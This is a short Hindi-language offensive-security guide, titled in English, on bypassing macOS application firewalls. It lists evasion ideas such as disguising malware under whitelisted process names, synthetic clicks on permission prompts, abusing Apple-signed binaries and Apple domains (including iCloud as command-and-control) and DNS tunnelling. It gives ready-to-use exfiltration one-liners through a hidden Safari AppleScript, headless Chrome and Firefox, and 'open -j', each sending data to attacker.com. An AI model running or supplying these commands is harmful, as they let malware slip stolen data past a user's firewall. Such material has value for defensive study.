macOS Bypassing Firewalls

पाए गए तकनीक

निम्नलिखित तकनीकों को कुछ macOS फ़ायरवॉल ऐप्स में काम करते पाया गया।

सफेद सूची नामों का दुरुपयोग

• उदाहरण के लिए मैलवेयर को launchd जैसे जाने-माने macOS प्रक्रियाओं के नामों से बुलाना

सिंथेटिक क्लिक

• अगर फ़ायरवॉल उपयोगकर्ता से अनुमति के लिए पूछता है तो मैलवेयर को अनुमति पर क्लिक करने के लिए

एप्पल द्वारा हस्ताक्षरित बाइनरी का उपयोग

• जैसे curl, लेकिन अन्य भी जैसे whois

जाने-माने एप्पल डोमेन

फ़ायरवॉल को जाने-माने एप्पल डोमेन्स जैसे apple.com या icloud.com कनेक्शन की अनुमति हो सकती है। और iCloud को C2 के रूप में उपयोग किया जा सकता है।

सामान्य छलकरना

फ़ायरवॉल को छलकरने के लिए कुछ विचार

अनुमति प्राप्त ट्रैफ़िक की जाँच

अनुमति प्राप्त ट्रैफ़िक को जानना आपको पोटेंशियली सफेद सूची डोमेन या जिन एप्लिकेशन्स को उन डोमेनों तक पहुंचने की अनुमति है, उन्हें पहचानने में मदद करेगा।

lsof -i TCP -sTCP:ESTABLISHED

DNS का दुरुपयोग

DNS निर्धारण mdnsreponder साइन की गई एप्लिकेशन के माध्यम से किया जाता है जिसे संभावित रूप से DNS सर्वर से संपर्क करने की अनुमति दी जाएगी।

ब्राउज़र ऐप्स के माध्यम से

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• गूगल क्रोम

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• फ़ायरफ़ॉक्स

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• सफारी

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

प्रक्रिया इंजेक्शन के माध्यम से

यदि आप कोड को किसी प्रक्रिया में इंजेक्ट कर सकते हैं जो किसी सर्वर से कनेक्ट करने की अनुमति देती है तो आप फ़ायरवॉल सुरक्षा को छल सकते हैं:

संदर्भ

• https://www.youtube.com/watch?v=UlT5KFTMn2k